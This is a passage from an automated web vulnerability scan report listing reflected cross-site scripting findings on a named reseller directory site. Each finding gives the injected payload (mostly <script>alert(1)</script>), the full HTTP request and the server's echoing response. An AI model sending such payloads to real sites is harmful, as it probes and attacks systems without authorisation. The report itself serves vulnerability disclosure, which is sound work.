Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d3896<script>alert(1)</script>cf2d1b9bd88 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/search.php?keyword=search...&Submit3=Search&opt=2&d3896<script>alert(1)</script>cf2d1b9bd88=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/search.php?keyword=search...&Submit3=Search&opt=2&d3896<script>alert(1)</script>cf2d1b9bd88=1 was not found on this server.</p>
...[SNIP]...

2.2548. http://www.resellerbase.com/detail/37/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 6da8e<a>94cc66dc805 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/37/themes/search.php?keyword=search...&Submit3=Search&opt=26da8e<a>94cc66dc805 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/search.php?keyword=search...&Submit3=Search&opt=26da8e<a>94cc66dc805 was not found on this server.</p>
...[SNIP]...

2.2549. http://www.resellerbase.com/detail/38/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1d6bd<script>alert(1)</script>35f89b6807a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail1d6bd<script>alert(1)</script>35f89b6807a/38/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail1d6bd<script>alert(1)</script>35f89b6807a/38/ was not found on this server.</p>
...[SNIP]...

2.2550. http://www.resellerbase.com/detail/38/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3a8e0<script>alert(1)</script>13d83415c21 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/383a8e0<script>alert(1)</script>13d83415c21/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/383a8e0<script>alert(1)</script>13d83415c21/ was not found on this server.</p>
...[SNIP]...

2.2551. http://www.resellerbase.com/detail/38/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6974b<script>alert(1)</script>952d6980c76 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/?6974b<script>alert(1)</script>952d6980c76=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/?6974b<script>alert(1)</script>952d6980c76=1 was not found on this server.</p>
...[SNIP]...

2.2552. http://www.resellerbase.com/detail/38/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8d7b6<script>alert(1)</script>ecd887f100073b88e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail8d7b6<script>alert(1)</script>ecd887f100073b88e/38/rating.php?id=38&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/whitelabelcash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail8d7b6<script>alert(1)</script>ecd887f100073b88e/38/rating.php?id=38&rating=5 was not found on this server.</p>
...[SNIP]...

2.2553. http://www.resellerbase.com/detail/38/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 58e1a<script>alert(1)</script>6514e9748b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail58e1a<script>alert(1)</script>6514e9748b/38/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail58e1a<script>alert(1)</script>6514e9748b/38/rating.php was not found on this server.</p>
...[SNIP]...

2.2554. http://www.resellerbase.com/detail/38/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f1804<script>alert(1)</script>9d92f8f5f904761b8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/38f1804<script>alert(1)</script>9d92f8f5f904761b8/rating.php?id=38&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/whitelabelcash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38f1804<script>alert(1)</script>9d92f8f5f904761b8/rating.php?id=38&rating=5 was not found on this server.</p>
...[SNIP]...

2.2555. http://www.resellerbase.com/detail/38/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d8416<script>alert(1)</script>b8af34bb5a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38d8416<script>alert(1)</script>b8af34bb5a9/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38d8416<script>alert(1)</script>b8af34bb5a9/rating.php was not found on this server.</p>
...[SNIP]...

2.2556. http://www.resellerbase.com/detail/38/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ec9d3<script>alert(1)</script>0f69087834d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/rating.phpec9d3<script>alert(1)</script>0f69087834d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/rating.phpec9d3<script>alert(1)</script>0f69087834d was not found on this server.</p>
...[SNIP]...

2.2557. http://www.resellerbase.com/detail/38/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 574c5<script>alert(1)</script>53512dddd4add4516 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/38/rating.php574c5<script>alert(1)</script>53512dddd4add4516?id=38&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/whitelabelcash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/rating.php574c5<script>alert(1)</script>53512dddd4add4516?id=38&rating=5 was not found on this server.</p>
...[SNIP]...

2.2558. http://www.resellerbase.com/detail/38/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1cf91<script>alert(1)</script>791a6385f828a599b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/38/rating.php/1cf91<script>alert(1)</script>791a6385f828a599b?id=38&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/whitelabelcash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/rating.php/1cf91<script>alert(1)</script>791a6385f828a599b?id=38&rating=5 was not found on this server.</p>
...[SNIP]...

2.2559. http://www.resellerbase.com/detail/38/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7c21e<script>alert(1)</script>3cbd3be135 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/rating.php?7c21e<script>alert(1)</script>3cbd3be135=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/rating.php?7c21e<script>alert(1)</script>3cbd3be135=1 was not found on this server.</p>
...[SNIP]...

2.2560. http://www.resellerbase.com/detail/38/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2d2f3<script>alert(1)</script>4e183f99559 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail2d2f3<script>alert(1)</script>4e183f99559/38/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/whitelabelcash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail2d2f3<script>alert(1)</script>4e183f99559/38/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2561. http://www.resellerbase.com/detail/38/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ee22e<script>alert(1)</script>361b8fe5830 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38ee22e<script>alert(1)</script>361b8fe5830/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/whitelabelcash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38ee22e<script>alert(1)</script>361b8fe5830/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2562. http://www.resellerbase.com/detail/38/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bae5a<script>alert(1)</script>09ec27f926b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/search.phpbae5a<script>alert(1)</script>09ec27f926b?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/whitelabelcash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/search.phpbae5a<script>alert(1)</script>09ec27f926b?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2563. http://www.resellerbase.com/detail/38/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/38/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload bd041<a>3ebe4fb077e was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/38/search.php?keyword=search...&Submit3=Searchbd041<a>3ebe4fb077e&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/whitelabelcash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/search.php?keyword=search...&Submit3=Searchbd041<a>3ebe4fb077e&opt=2 was not found on this server.</p>
...[SNIP]...

2.2564. http://www.resellerbase.com/detail/38/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/38/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 84b0e<a>298db26ffe2 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/38/search.php?keyword=search...84b0e<a>298db26ffe2&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/whitelabelcash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/search.php?keyword=search...84b0e<a>298db26ffe2&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2565. http://www.resellerbase.com/detail/38/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 56639<script>alert(1)</script>55ad9e51bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/search.php?keyword=search...&Submit3=Search&opt=2&56639<script>alert(1)</script>55ad9e51bd=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/whitelabelcash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/search.php?keyword=search...&Submit3=Search&opt=2&56639<script>alert(1)</script>55ad9e51bd=1 was not found on this server.</p>
...[SNIP]...

2.2566. http://www.resellerbase.com/detail/38/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/38/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 83fca<a>c770127ee66 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

